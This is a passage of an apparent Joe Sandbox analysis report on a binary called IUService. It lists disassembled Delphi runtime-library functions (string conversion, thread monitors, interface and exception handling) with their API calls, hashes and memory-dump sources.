                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A7D5), ref: 5001A780
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A7D5), ref: 5001A79F
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A7D5), ref: 5001A7BA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983657741-0
                                                                                                                                            • Opcode ID: 8f8e674ff806139dc7915cbd04f5f4ac68111c59e7e358a9f3dc38c30ea9b737
                                                                                                                                            • Instruction ID: 6fc85c46829d5016a76dc39be3afba1c4c63ccbbd777daa4708c9c8809dd5562
                                                                                                                                            • Opcode Fuzzy Hash: 8f8e674ff806139dc7915cbd04f5f4ac68111c59e7e358a9f3dc38c30ea9b737
                                                                                                                                            • Instruction Fuzzy Hash: 89116534A04298EFDB11DFA8DD9199DB7F8EF4A210B6043B6E500D36D1E7749F80D681
                                                                                                                                            Function 50007734 Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 50007749
                                                                                                                                              • Part of subcall function 50007234: GetCurrentThreadId.KERNEL32 ref: 50007238
                                                                                                                                              • Part of subcall function 50007234: @System@Error$qqr20System@TRuntimeError.RTL120 ref: 50007243
                                                                                                                                            • @System@TMonitor@QueueWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(00000000,500077CE), ref: 50007773
                                                                                                                                            • @System@TMonitor@Exit$qqrv.RTL120(00000000,500077CE), ref: 50007781
                                                                                                                                              • Part of subcall function 500074A4: @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 500074AA
                                                                                                                                              • Part of subcall function 500074A4: @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500074D9
                                                                                                                                            • @System@TMonitor@Enter$qqrui.RTL120(?), ref: 500077A2
                                                                                                                                              • Part of subcall function 5000730C: @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                                                              • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007343
                                                                                                                                              • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007355
                                                                                                                                            • @System@TMonitor@RemoveWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(?), ref: 500077AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Monitor@$Thread$CheckCountOwningThread$qqrvTickWaiter$qqrr30Waiting$CurrentEnter$qqruiEnter$qqrvErrorError$qqr20Event$qqrvExit$qqrvQueueRemoveRuntime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3245137772-0
                                                                                                                                            • Opcode ID: c8d6062a3806072e0c5270ae9d5596829130f44f1f64b0f71c9e445ccb500201
                                                                                                                                            • Instruction ID: 9226aa66a553e5a02f3549cd2e7d24c02f66a86d0b6f512f8c85fedbd385ecc6
                                                                                                                                            • Opcode Fuzzy Hash: c8d6062a3806072e0c5270ae9d5596829130f44f1f64b0f71c9e445ccb500201
                                                                                                                                            • Instruction Fuzzy Hash: 19114F74E016849FEB00CFB8DE9445EBBF4EF4871075586A9E819E7352D778AD00CBA0
                                                                                                                                            Function 500283D4 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028410
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 5002842B
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028439
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3042977434-0
                                                                                                                                            • Opcode ID: 35d1e42feb42f13eecb656c74661683a5158f8c6915138d9e1fd8d021dc4de57
                                                                                                                                            • Instruction ID: 36fcfea0c2849a8d324b642c74e4cb449ffd548fbf6f67616c7ea078cdc77676
                                                                                                                                            • Opcode Fuzzy Hash: 35d1e42feb42f13eecb656c74661683a5158f8c6915138d9e1fd8d021dc4de57
                                                                                                                                            • Instruction Fuzzy Hash: A201F935A031979FEB00EFA4EC42599B3FAEF843007958772E904A3625E7399E00D350
                                                                                                                                            Function 5001A7E4 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A86A), ref: 5001A81D
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A86A), ref: 5001A837
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A86A), ref: 5001A84F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983657741-0
                                                                                                                                            • Opcode ID: 74344b50583a924356235f014e24c58766c9e58c312ed4462f199f85a523a2ea
                                                                                                                                            • Instruction ID: 132a61221e42f68fe096f2f0703ce72c7c0d537a3ed7cef0da9aebb690a8ca7d
                                                                                                                                            • Opcode Fuzzy Hash: 74344b50583a924356235f014e24c58766c9e58c312ed4462f199f85a523a2ea
                                                                                                                                            • Instruction Fuzzy Hash: 6301B930A11399EFEB14DFA9DD529ADB3F8FF4A200BA04276E500D3111EB70DE41D691
                                                                                                                                            Function 50015834 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500158BE), ref: 50015874
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500158BE), ref: 50015891
                                                                                                                                            • @Sysutils@AnsiSameStr$qqrx20System@UnicodeStringt1.RTL120(?,00000000,500158BE), ref: 5001589C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiSystem@@$FromStr$qqrr20StringStringx27System@%T$us$i0$%$Copy$qqrx20InternalSameStr$qqrx20StringiiStringt1Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 379066412-0
                                                                                                                                            • Opcode ID: c9586697ffbc2b73cdd91dbbcbba96766bafe00c22bacf04bf09434da6c89794
                                                                                                                                            • Instruction ID: 5f4c935dc7326f4b5ffd1e52cde991efdb19edfe8de5ec90e514678ba51a4583
                                                                                                                                            • Opcode Fuzzy Hash: c9586697ffbc2b73cdd91dbbcbba96766bafe00c22bacf04bf09434da6c89794
                                                                                                                                            • Instruction Fuzzy Hash: 15018030B00288EFEF01CFA8D99199EB7F9EF49300FA042B6E504E7245EB309E449651
                                                                                                                                            Function 50034AFC Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50034B1F
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,50034BA6,?,?,?), ref: 50034B50
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,50034BA6,?,?,?), ref: 50034B5C
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,50034BA6,?,?,?), ref: 50034B6E
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50034B90,00000000,50034BA6,?,?,?), ref: 50034B83
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$From$AnsiCharChar$qqrr20Check$qqrlususClear$qqrr8Copy$qqrx20DataInitInternalLen$qqrr20ResultStr$qqrr20StringStringiiStringpbStringpbiStringx27System@%T$us$i0$%VariantVariants@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3736319910-0
                                                                                                                                            • Opcode ID: ebd834bf680c6baec22fe879fb1f0e6004b62349d4d0877ebd8845f9e908f8bb
                                                                                                                                            • Instruction ID: dc333be834a63f94453bcacffb570c20eb218bb0109c4df2f1bcee80a57512a2
                                                                                                                                            • Opcode Fuzzy Hash: ebd834bf680c6baec22fe879fb1f0e6004b62349d4d0877ebd8845f9e908f8bb
                                                                                                                                            • Instruction Fuzzy Hash: 0C01D2705006886FDB12CBA4DC61FAFB3ECFB4A310F510672FA10E3690D630AD00C6A1
                                                                                                                                            Function 5000D160 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                                                            • @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20InternalUtf8$qqrpcuipbui
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3779820642-0
                                                                                                                                            • Opcode ID: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                                                            • Instruction ID: e04ebdc101fc4bf289a004674db906102c3d27fd8c3307898635fa4b721bd642
                                                                                                                                            • Opcode Fuzzy Hash: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                                                            • Instruction Fuzzy Hash: A1017534611A85BFBB11CFB9D9B199AB7F9EF492007D04677E504D3601EA30EE01D660
                                                                                                                                            Function 5002B158 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B17B
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B189
                                                                                                                                              • Part of subcall function 50006CB4: @System@TObject@GetInterfaceEntry$qqrrx5_GUID.RTL120(00000000,50006D38), ref: 50006CE0
                                                                                                                                              • Part of subcall function 50006CB4: @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(50006D3F), ref: 50006D32
                                                                                                                                            • @Sysutils@Supports$qqrx45System@%DelphiInterface$t17System@IInterface%rx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B199
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B1A8
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(5002B1D6,?,?,?,00000000), ref: 5002B1C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$DelphiInterface$t17System@%$Clear$qqrr45Interface%IntfObject@System@@$Interface$qqrrx5_$Entry$qqrrx5_InterfaceInterface%rx5_Supports$qqrx45Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3577717398-0
                                                                                                                                            • Opcode ID: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
                                                                                                                                            • Instruction ID: 3f1c98fecfe68b52bf16856e5ff3d398f0e3bde1a59a24ad800dfe1f19cdd018
                                                                                                                                            • Opcode Fuzzy Hash: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
                                                                                                                                            • Instruction Fuzzy Hash: 6CF0F9303062855BEB04EBA5FC7295AB3DECF99358BD14276A900C3303DA60DC254690
                                                                                                                                            Function 5002A914 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A99F,?,00000000), ref: 5002A940
                                                                                                                                              • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                                                              • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A99F,?,00000000), ref: 5002A962
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002A99F,?,00000000), ref: 5002A978
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,5002A99F,?,00000000), ref: 5002A984
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Sysutils@Unicode$Exception@$bctr$qqrp20Recxi$Asg$qqrr20CharClassClassoCreate$qqrp17ErrorExcept$qqrvFormatFormat$qqrx20FromLen$qqrr20LoadMessageMessage$qqruiMetaRaiseRecpx14String$qqrp20StringpbiStringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1617757611-0
                                                                                                                                            • Opcode ID: 34b26c9ffda536621193965357a84d2c17b85b6f44bcd05500fd26bb6e704703
                                                                                                                                            • Instruction ID: 9c2c5285b6efc6558c6871cf73d9fb702bd57b1419b1abeba3fe6d9365420b74
                                                                                                                                            • Opcode Fuzzy Hash: 34b26c9ffda536621193965357a84d2c17b85b6f44bcd05500fd26bb6e704703
                                                                                                                                            • Instruction Fuzzy Hash: E201DB74A056869FD714CFA5FC809AEB7F9EB59300F51863AE900E3351DB309D40C7A1
                                                                                                                                            Function 500282B4 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 500282F2
